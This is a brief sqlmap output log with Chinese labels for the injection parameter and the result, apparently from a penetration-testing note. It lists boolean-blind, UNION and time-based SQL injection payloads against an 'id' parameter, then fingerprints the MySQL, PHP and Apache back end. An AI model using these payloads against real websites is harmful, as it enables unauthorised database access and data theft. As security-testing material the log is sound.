注入参数id= [12:01:24] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=86' AND 2190=2190 AND 'wDPE'='wDPE Type: UNION query Title: MySQL UNION query (NULL) - 21 columns Payload: id=-2346' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7 173636671,0x477169766e6a7a516e71,0x7179736171),NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=86' AND SLEEP(5) AND 'hgqm'='hgqm --- [12:01:25] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 6.5 web application technology: PHP 5.3.3, Apache 2.2.15 结果: